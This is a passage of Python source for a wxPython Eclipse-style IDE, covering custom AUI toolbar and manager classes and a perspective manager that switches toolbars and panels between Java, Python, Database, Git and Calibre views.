            self.SetHoverItem(hit_item)
        # figure out tooltips
        packing_hit_item = self.FindToolForPositionWithPacking(*event.GetPosition())
        if packing_hit_item:
            if packing_hit_item != self._tip_item:
                self._tip_item = packing_hit_item
                if packing_hit_item.short_help != "":
                    self.StartPreviewTimer()
                    self.SetToolTip(packing_hit_item.short_help)
                else:
                    self.SetToolTip("")
                    self.StopPreviewTimer()
        else:
            self.SetToolTip("")
            self._tip_item = None
            self.StopPreviewTimer()
        # if we've pressed down an item and we're hovering
        # over it, make sure it's state is set to pressed
        if self._action_item:
            if self._action_item == hit_item:
                self.SetPressedItem(self._action_item)
            else:
                self.SetPressedItem(None)
        # figure out the dropdown button state (are we hovering or pressing it?)
        self.RefreshOverflowState()
        # NOTE(review): Realize() on every mouse move is not in the stock
        # handler; it re-lays-out the bar each motion and may be costly —
        # confirm it is needed.
        self.Realize()
class MyAuiManager(aui.AuiManager):
    """AuiManager subclass adding notebook-tab helpers, substring pane lookup,
    and right-alignment of the perspective toolbar on frame resize."""

    def __init__(self, managed_window=None, agwFlags=None):
        super(MyAuiManager, self).__init__(managed_window=managed_window, agwFlags=agwFlags)

    def addTabByWindow(self, window=None , icon=None, imageName="script.png", name=None, captionName=None, tabDirection=5):
        '''
        Always creates a new tab for the given window.

        tabDirection=2 is the right
        tabDirection=3 is the bottom
        tabDirection=4 is the left
        tabDirection=5 is the center
        '''
        self.SetAutoNotebookStyle(aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE)
        if name == None:
            name = captionName
        isPaneAdded = False
        # Look for an existing pane docked in the requested direction and add
        # the new window as a notebook page next to it.
        for pane in self.GetAllPanes():
            # logger.debug(pane.dock_direction_get())
            if pane.dock_direction_get() == tabDirection:  # adding to center tab
                if not icon:
                    icon = FileOperations().getImageBitmap(imageName=imageName)
                auiPanInfo = aui.AuiPaneInfo().Icon(icon).\
                    Name(name).Caption(captionName).LeftDockable(True).Direction(wx.TOP).\
                    Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).MinSize(200, -1)\
                    .BestSize(200, -1).CaptionVisible(visible=True)
                targetTab = pane
                if not pane.HasNotebook():
                    # First companion: wrap the existing pane in a notebook.
                    self.CreateNotebookBase(self._panes, pane)
                    # targetTab.NotebookPage(pane.notebook_id)
                    self.AddPane(window, auiPanInfo, target=targetTab)
                    isPaneAdded = True
                    # self._mgr._notebooks
                    # self._mgr.ActivatePane(targetTab.window)
                else:
                    self.AddPane(window, auiPanInfo, target=targetTab)
                    isPaneAdded = True
                break
        if not isPaneAdded:
            # No pane in that direction yet: dock the window as a fresh pane.
            auiPanInfo = aui.AuiPaneInfo().Icon(FileOperations().getImageBitmap(imageName=imageName)).\
                Name(name).Caption(captionName).LeftDockable(True).Dockable(True).Movable(True).MinSize(200, -1).BestSize(200, -1).CaptionVisible(visible=True).Direction(wx.TOP).\
                Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True)
            auiPanInfo.dock_direction = tabDirection
            self.AddPane(window, auiPanInfo)
        self.Update()

    def OnTabBeginDrag(self, event):
        """
        Handles the ``EVT_AUINOTEBOOK_BEGIN_DRAG`` event.

        :param `event`: a :class:`~wx.lib.agw.aui.auibook.AuiNotebookEvent` event to be processed.
        """
        if self._masterManager:
            self._masterManager.OnTabBeginDrag(event)
        else:
            paneInfo = self.PaneFromTabEvent(event)
            if paneInfo.IsOk():
                # It's one of ours!
                self._action = actionDragFloatingPane
                mouse = wx.GetMousePosition()
                # set initial float position - may have to think about this
                # offset a bit more later ...
                self._action_offset = wx.Point(20, 10)
                self._toolbar_action_offset = wx.Point(20, 10)
                paneInfo.floating_pos = mouse - self._action_offset
                paneInfo.dock_pos = AUI_DOCK_NONE
                paneInfo.notebook_id = -1
                tab = event.GetEventObject()
                try:
                    if tab.HasCapture():
                        tab.ReleaseMouse()
                except:
                    pass
                # float the window
                if paneInfo.IsMaximized():
                    self.RestorePane(paneInfo)
                paneInfo.Float()
                # The call to Update may result in
                # the notebook that generated this
                # event being deleted, so we have
                # to do the call asynchronously.
                wx.CallAfter(self.Update)
                self._action_window = paneInfo.window
                self._frame.CaptureMouse()
                event.SetDispatched(True)
            else:
                # not our window
                event.Skip()

    def GetPaneByHavingName(self, name):
        """
        This version of :meth:`GetPane` looks up a pane based on a 'pane name'.

        :param string `name`: the pane name.

        :see: :meth:`GetPane`
        """
        # Substring match: returns the first pane whose registered name occurs
        # inside `name`; falls back to the NonePaneInfo sentinel.
        for p in self._panes:
            if p.name in name:
                return p
        return NonePaneInfo

    def hidePane(self, window):
        # Convenience wrapper: hide (not destroy) the pane owning `window`.
        self.ShowPane(window, show=False)

    def OnSize(self, event):
        super().OnSize(event)
        (x, y) = self._frame.GetClientSize()
        perspectiveToolbar = self.GetPane("perspectiveToolbar")
        # Keep the perspective toolbar flush with the frame's right edge:
        # NOTE(review): assumes 32px per tool item (two items excluded) plus a
        # 5px margin — confirm against the actual tool bitmap size.
        perspectiveToolbar.dock_pos = x - ((len(perspectiveToolbar.window._items) - 2) * 32) + 5
        self.Update()
        # self.DoDropToolbar(self._docks, self._panes, perspectiveToolbar, point, wx.Point(0,0))
class PerspectiveManager(object):
"""Creates a perspective manager for the given aui managed window.
It supports saving and loading of on disk perspectives as created by
calling SavePerspective from the AuiManager. Mixin class for a wx.Frame.
"""
def __init__(self, base=None):
"""Initializes the perspective manager. The auimgr parameter is
a reference to the windows AuiManager instance, base is the base
path to where perspectives should be loaded from and saved to.
@param base: path to configuration cache
"""
super(PerspectiveManager, self).__init__()
self.toolbarItems = {}
self.createAuiManager()
pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
self.accel_tbl = wx.AcceleratorTable([
(wx.ACCEL_CTRL, ord('N'), ID_NEW),
(wx.ACCEL_CTRL, ord('Y'), ID_REDO),
(wx.ACCEL_CTRL, ord('Z'), ID_UNDO),
(wx.ACCEL_CTRL, ord('C'), ID_COPY),
(wx.ACCEL_CTRL, ord('V'), ID_PASTE),
(wx.ACCEL_CTRL, ord('X'), ID_CUT),
(wx.ACCEL_CTRL | wx.ACCEL_ALT, wx.WXK_DOWN, ID_DUPLICATE_LINE),
(wx.ACCEL_CTRL, ord('S'), ID_SAVE),
(wx.ACCEL_CTRL, ord('H'), ID_SEARCH_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('F'), ID_FORMAT_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('R'), ID_RESOURCE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('T'), ID_OPEN_TYPE),
# (wx.ACCEL_CTRL, ord('V'), wx.ID_PASTE),
# (wx.ACCEL_ALT, ord('X'), wx.ID_PASTE),
# (wx.ACCEL_SHIFT | wx.ACCEL_ALT, ord('Y'), wx.ID_PASTE)
])
self.SetAcceleratorTable(self.accel_tbl)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'PerspectiveManager.__onUpdatePageText: {filePath}')
viewToolbar = self._mgr.GetPane("viewToolbar")
print(extra1)
toolSave = viewToolbar.window.FindTool(ID_SAVE)
toolSaveAll = viewToolbar.window.FindTool(ID_SAVE_ALL)
toolSaveAll.state = aui.AUI_BUTTON_STATE_NORMAL
toolSave.state = aui.AUI_BUTTON_STATE_NORMAL
logger.info(toolSave.state)
self.updateTitle(title=filePath)
self._mgr.Update()
if extra2:
print(extra2)
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('PerspectiveManager', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
def createAuiManager(self):
logger.debug('createAuiManager')
# tell FrameManager to manage this frame
self._mgr = MyAuiManager()
self._mgr.SetManagedWindow(self)
# set up default notebook style
self._notebook_style = aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE
self._notebook_theme = 1
# min size for the frame itself isn't completely done.
# see the end up AuiManager.Update() for the test
# code. For now, just hard code a frame minimum size
self.SetMinSize(wx.Size(100, 100))
self._perspectives = []
# add a bunch of panes
# self._mgr.AddPane(self.CreateSizeReportCtrl(), wx.aui.AuiPaneInfo().Name("test1").Caption("Pane Caption").Top().CloseButton(True).MaximizeButton(True))
# add the toolbars to the manager
# topToolBar = wx.BoxSizer(wx.HORIZONTAL)
# topToolBar.Add(self.constructToolBar(),1,wx.ALIGN_LEFT,4) # note the 2nd param 'proportion' is 1
# #topToolBar.AddStretchSpacer()
# topToolBar.Add(self.constructToolBar(),0,wx.ALIGN_RIGHT,4)
self._mgr.AddPane(self.constructViewToolBar(), aui.AuiPaneInfo().
Name("viewToolbar").Caption("View Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True))
self._mgr.AddPane(self.constructPerspectiveToolBar(), aui.AuiPaneInfo().
Name("perspectiveToolbar").Caption("Perspective Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True), self.definePoint())
# self._mgr.AddPane(self.creatingFileExplorer(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="file_explorer.png")).BestSize(500, -1).
# Name("fileExplorer").Caption("File Explorer").Dockable(True).Movable(True).MinSize(500, -1).Resizable(True).
# Left().Layer(1).Position(2).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.creatingTreeCtrl(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="folder_database.png")).BestSize(500, -1).
# Name("databaseNaviagor").Caption("Database Navigator").Dockable(True).Movable(True).MinSize(500, -1).
# Left().Layer(1).Position(1).CloseButton(True).MaximizeButton(True).MinimizeButton(True), target=self._mgr.GetPane("fileExplorer"))
self._mgr.AddPane(WelcomePanel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="welcome16.png")).BestSize(500, -1).
Name("onWelcome").Caption("Welcome").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(wx.Panel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="variable_view.png")).BestSize(500, -1).
# Name("variableView").Caption("Variable").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
# Right().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructCenterPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("centerPane").Caption("Center Pane").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.getWorksheet(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("Worksheet-0").Caption("Worksheet-0").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().Icon(wx.Bitmap(os.path.join(path, "script.png"))).
# Name("schemaViewer").Caption("Schema Viewer").LeftDockable(True).
# Center().CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().
# Name("test9").Caption("Min Size 200x100").
# BestSize(wx.Size(200, 100)).MinSize(wx.Size(200, 100)).
# Bottom().Layer(1).CloseButton(True).MaximizeButton(True))
# self._mgr.AddPane(self.sqlConsoleOutputPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="console_view.png")).
# Name("consoleOutput").Caption("Console").Dockable(True).Movable(True).LeftDockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True).PinButton(visible=True).GripperTop())
# self._mgr.AddPane(self.constructHistoryPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="sql.png")).
# Name("sqlLog").Caption("SQL Log").Dockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True), target=self._mgr.GetPane("consoleOutput"))
self._mgr.GetPane("onWelcome").Show()
viewToolbar = self._mgr.GetPane("viewToolbar")
viewToolbar.Show()
self._mgr.GetPane("variableView").Show()
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
perspectiveToolbar.dock_row = viewToolbar.dock_row
perspectiveToolbar.Show()
self.perspective_default = self._mgr.SavePerspective()
perspective_all = self._mgr.SavePerspective()
self.setStyleToPanes()
all_panes = self._mgr.GetAllPanes()
# "commit" all changes made to FrameManager
self._mgr.Update()
# some more event
self.Bind(aui.EVT_AUI_PANE_CLOSE, self.OnPaneClose)
self.Bind(aui.EVT_AUINOTEBOOK_ALLOW_DND, self.OnAllowNotebookDnD)
self.Bind(aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnNotebookPageClose)
self.Bind(aui.EVT_AUI_PANE_FLOATING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_FLOATED, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKED, self.OnFloatDock)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_TIMER, self.TimerHandler)
self.timer = wx.Timer(self)
self.timer.Start(100)
#######################################################################################
def definePoint(self):
'''
right align toolbar
'''
managed_window = self._mgr.GetManagedWindow()
wnd_pos = managed_window.GetPosition()
(x, y) = wnd_size = managed_window.GetSize()
point = wx.Point(x - ((len(self.perspectiveList) - 1) * 32) + 5, 0)
return point
def OnPaneClose(self, event):
logger.debug("OnPaneClose")
# if event.pane.name == "test10":
# msg = "Are you sure you want to "
# if event.GetEventType() == aui.wxEVT_AUI_PANE_MINIMIZE:
# msg += "minimize "
# else:
# msg += "close/hide "
#
# res = wx.MessageBox(msg + "this pane?", "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnAllowNotebookDnD(self, event):
# for the purpose of this test application, explicitly
# allow all noteboko drag and drop events
event.Allow()
def OnNotebookPageClose(self, event):
logger.debug("OnNotebookPageClose")
ctrl = event.GetEventObject()
# if isinstance(ctrl.GetPage(event.GetSelection()), wx.html.HtmlWindow):
#
# res = wx.MessageBox("Are you sure you want to close/hide this notebook page?",
# "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnFloatDock(self, event):
paneLabel = event.pane.caption
etype = event.GetEventType()
strs = "Pane %s " % paneLabel
if etype == aui.wxEVT_AUI_PANE_FLOATING:
strs += "is about to be floated"
if event.pane.name == "test8" and self._veto_tree:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_FLOATED:
strs += "has been floated"
elif etype == aui.wxEVT_AUI_PANE_DOCKING:
strs += "is about to be docked"
if event.pane.name == "test11" and self._veto_text:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_DOCKED:
strs += "has been docked"
logger.debug(strs)
def __del__(self):
self.timer.Stop()
def OnClose(self, event):
self.timer.Stop()
self._mgr.UnInit()
event.Skip()
def TimerHandler(self, event):
try:
self.gauge.Pulse()
except:
self.timer.Stop()
#######################################################################################
def setStyleToPanes(self):
all_panes = self._mgr.GetAllPanes()
for pane in all_panes:
if isinstance(pane.window, aui.AuiNotebook):
nb = pane.window
nb.SetAGWWindowStyleFlag(self._notebook_style)
nb.SetArtProvider(aui.ChromeTabArt())
nb.Refresh()
nb.Update()
def constructPerspectiveToolBar(self):
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
tb1 = EclipseAuiToolbar(self)
self.perspectiveList = [
[ID_OTHER_PERSPECTIVE, "Open Perspective", 'new_persp.png', 'Open Perspective', None],
[],
[ID_JAVA_PERSPECTIVE, "Java", 'jperspective.png', 'Java', self.onPerspeciveSelection],
[ID_JAVA_EE_PERSPECTIVE, "Java EE", 'javaee_perspective.png', 'Java EE', self.onPerspeciveSelection],
[ID_DEBUG_PERSPECTIVE, "Debug", 'debug_persp.png', 'Debug', self.onPerspeciveSelection],
[ID_PYTHON_PERSPECTIVE, "Python", 'python_perspective.png', 'Python', self.onPerspeciveSelection],
[ID_DATABASE_PERSPECTIVE, "Database", 'database.png', 'Database', self.onPerspeciveSelection],
[ID_GIT_PERSPECTIVE, "Git", 'gitrepository.png', 'Git', self.onPerspeciveSelection],
[ID_RESOURCE_PERSPECTIVE, "Resources", 'resource_persp.png', 'Resources', self.onPerspeciveSelection],
[ID_CALIBRE_PERSPECTIVE, "Calibre", 'vl_16.png', 'Calibre', self.onPerspeciveSelection],
]
for perspectiveName in self.perspectiveList:
if len(perspectiveName) > 1:
toolBarItem = tb1.AddSimpleTool(perspectiveName[0], perspectiveName[1], self.fileOperations.getImageBitmap(imageName=perspectiveName[2]), short_help_string=perspectiveName[3])
if perspectiveName[4]:
self.Bind(wx.EVT_MENU, perspectiveName[4], id=perspectiveName[0])
if toolBarItem.label == 'Python':
self.selectedPerspectiveName = 'python'
tb1.SetPressedItem(toolBarItem)
else:
tb1.AddSeparator()
return tb1
# def onOpenPerspecitve(self, event):
# logger.debug('onOpenPerspecitve')
def selectItem(self, id=None):
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
item = perspectiveToolbar.window.getToolBarItemById(id)
perspectiveToolbar.window.EnableTool(item, True)
# def hideTools(self,viewToolbar.window, perspectiveName):
# pass
def viewToolBarByPerspective(self, perspectiveName):
viewToolbar = self._mgr.GetPane("viewToolbar")
# viewToolbar.window.DeleteTool(wx.ID_PREFERENCES)
self.constructViewToolBar(viewToolbar.window, perspectiveName)
s = viewToolbar.window.GetMinSize()
viewToolbar.BestSize(s)
allowedInstanceForProspective = [
# SqlConsoleOutputPanel,
py.shell.Shell,
PythonExplorerPanel,
DataSourcePanel,
CreatingJavaExplorerPanel,
FileBrowser,
]
if self.selectedPerspectiveName == 'database':
allowedInstanceForProspective.remove(DataSourcePanel)
elif self.selectedPerspectiveName == 'python':
allowedInstanceForProspective.remove(PythonExplorerPanel)
allowedInstanceForProspective.remove(py.shell.Shell)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'resource':
allowedInstanceForProspective.remove(FileBrowser)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'git':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
# for pane in self._mgr.GetAllPanes():
# if pane.window:
# for instance in allowedInstanceForProspective :
# if isinstance(pane.window, instance):
# self._mgr.ClosePane(pane)
# pane.window.Destroy()
# pane.DestroyOnClose(True)
if self.selectedPerspectiveName == 'database':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="databaseNaviagor", imageName="folder_database.png", captionName="Database Navigator", tabDirection=4)
elif self.selectedPerspectiveName == 'python':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="pythonShellView", imageName="shell.png", captionName="Python Shell", tabDirection=3)
self.openPanel(name="pythonPackageExplorer", imageName="package_explorer.png", captionName="Python Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'resource':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="fileExplorer", imageName="file_explorer.png", captionName="File Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'java':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="javaPackageExplorer", imageName="package_explorer.png", captionName="Java Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'calibre':
self.openPanel(name="bookBrowser", imageName="library-16.png", captionName="Book Browser", tabDirection=5)
self.openPanel(name="bookExplorer", imageName="package_explorer.png", captionName="Book Explorer", tabDirection=4)
# else:
# databaseNaviagorPane = self._mgr.GetPane("databaseNaviagor")
# databaseNaviagorPane.Show(False)
for pane in self._mgr.GetAllPanes():
if pane.window:
for instance in allowedInstanceForProspective :
if isinstance(pane.window, instance):
self._mgr.ClosePane(pane)
for pane in self._mgr.GetAllPanes():
if pane.window:
logger.debug(f'pane.window:{pane.window}, pane.window.IsShown():{pane.window.IsShown()}')
self.appendSubMenu(menuBar=self.GetMenuBar(), selectedPerspectiveName=self.selectedPerspectiveName)
self._mgr.Update()
print('viewToolBarByPerspective')
# def openPanel(self, name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3):
# # name="consoleOutput"
# pane = self._mgr.GetPane(name)
# panel = wx.Panel(self)
# if pane.window == None:
# if name == "consoleOutput":
# panel = SqlConsoleOutputPanel(self)
# elif name == "databaseNaviagor":
# panel = DataSourcePanel(self)
# elif name == "pythonPackageExplorer":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "projectExplorerView":
# panel = CreatingProjectExplorerPanel(self)
# elif name == "javaPackageExplorer":
# panel = CreatingJavaExplorerPanel(self)
# elif name == "pythonShellView":
# intro = f'{py.version.VERSION}'
# panel = py.shell.Shell(self, -1, introText=intro)
# elif name == "terminalView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "navigatorView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "tasksView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "fileExplorer":
# panel = FileBrowser(self, size=(500, 300))
# elif name == "bookExplorer":
# panel = BookExplorerPanel(self, size=(500, 300))
#
# self._mgr.addTabByWindow(panel, imageName=imageName, name=name , captionName=captionName, tabDirection=tabDirection)
# elif not pane.IsShown():
# pane.dock_direction = tabDirection
# window = pane.window
# if window:
# window.Show()
# pane.Show(True)
# # item.state=4
def onPerspeciveSelection(self, event):
logger.debug('onPerspeciveSelection')
# pub.sendMessage('perspectiveClicked', data=42, extra1='onJavaPerspective')
self.selectItem(event.Id)
if event.Id == ID_CALIBRE_PERSPECTIVE:
self.selectedPerspectiveName = 'calibre'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
if event.Id == ID_JAVA_PERSPECTIVE:
self.selectedPerspectiveName = 'java'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_JAVA_EE_PERSPECTIVE:
self.selectedPerspectiveName = 'java ee'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DEBUG_PERSPECTIVE:
self.selectedPerspectiveName = 'debug'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_PYTHON_PERSPECTIVE:
self.selectedPerspectiveName = 'python'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DATABASE_PERSPECTIVE:
self.selectedPerspectiveName = 'database'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_GIT_PERSPECTIVE:
self.selectedPerspectiveName = 'git'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_RESOURCE_PERSPECTIVE:
self.selectedPerspectiveName = 'resource'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
def constructViewToolBar(self, toobar=None, perspectiveName='python'):
# create some toolbars
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
if toobar == None:
self._ctrl = None
toobar = EclipseAuiToolbar(self)
# id, leble, imageName, lebel, method,setToolDropdown , list of perspective, initial state(disable/enable ), kind=wx.ITEM_CHECK
tools = [
(ID_NEW, "New", "new_con.png", 'New', self.onNewMenu, True, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SAVE, "Save (Ctrl+S)", "save.png", 'Save (Ctrl+S)', self.onSave, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_SAVE_ALL, "Save All (Ctrl+Shift+S)", "saveall_edit.png", 'Save All (Ctrl+Shift+S)', self.onSaveAll, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_BUILD_ALL, "Build All (Ctrl+B)", "build_exec.png", "Build All (Ctrl+B)", None, False, [ 'python', 'java', 'java ee'], True, wx.ITEM_NORMAL),
(ID_TERMINAL, "Open a Terminal", "linux_terminal.png", "Open a Terminal (Ctrl+Shift+Alt+T)", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SKIP_ALL_BREAKPOINTS, "Skip All Breakpoints (Ctrl+Alt+B)", "skip_brkp.png", "Skip All Breakpoints (Ctrl+Alt+B)", self.onSkipAllBreakPoints, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_CHECK),
(ID_NEW_JAVA_PACKAGE, "New Java Package", "newpack_wiz.png", "New Java Package", self.onOpenTerminal, False, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_NEW_JAVA_CLASS, "New Java Class", "newclass_wiz.png", "New Java Class", self.onOpenTerminal, True, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_RESUME_DEBUG, "Resume", "resume_co.png", "Resume", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_SUSPEND_DEBUG, "Suspend", "suspend_co.png", "Suspend", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_TERMNATE_DEBUG, "Terminate", "terminatedlaunch_obj.png", "Terminate", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_DISCONNECT_DEBUG, "Disconnect", "disconnect_co.png", "Disconnect", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_INTO_DEBUG, "Step Into", "stepinto_co.png", "Step Into", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_OVER_DEBUG, "Step Over", "stepover_co.png", "Step Over", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_RETURN_DEBUG, "Step Return", "stepreturn_co.png", "Step Return", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(),
(ID_DEBUG_AS_MENU, "Debug As...", "debug_exc.png", "Debug As...", self.onOpenTerminal, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_RUN_AS_MENU, "Run As...", "run_exc.png", "Run As...", self.onRunAsMenu, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_DYNAMIC_WEB_PROJECT, "Create a Dynamic Web Project", "create_dynamic_web_project.png", "Create a Dynamic Web Project", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_NEW_SERVLET, "Create a New Servlet", "create_new_servlet.png", "Create a New Servlet", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_OPEN_TYPE, "Open Type", "opentype.png", "Open Type", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_OPEN_TASK, "Open Task (Ctrl+F12)", "open_task.png", "Open Task (Ctrl+F12)", self.onOpenTask, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_SEARCH, "Search", "searchres.png", "Search", self.onOpenSearch, True, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_LAST_EDIT, "Last Edit Location", "last_edit_pos.png", "Last Edit Location", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_BACKWARD, "Back", "backward_nav.png", "Back", self.onOpenTerminal, True, ['python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_FORWARD, "Forward", "forward_nav.png", "Forward", self.onOpenTerminal, True, ['python', 'java', 'debug'], False, wx.ITEM_NORMAL),
(ID_newConnection, "New Connection", "connect.png", "New Connection", None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_openConnection, "Open Connection", "database_connect.png", 'Open Connection', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_newWorksheet, "Script", "script.png", 'Open a new script worksheet', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_ADD_BOOK, "Add Book", "add_book_16.png", 'Add Book', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_EDIT_BOOK_METADATA, "Edit Book metadata", "edit_book_16.png", 'Edit Book metadata', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONVERT_BOOK, "Convert Book", "txn_config.png", 'Convert Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_REMOVE_BOOK, "Remove Book", "remove_books_16.png", 'Remove Book', lambda e: self.onCalibre(e), False, ['calibre'], True,wx.ITEM_NORMAL),
(ID_GET_BOOK, "Get Book", "store_16.png", 'Get Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
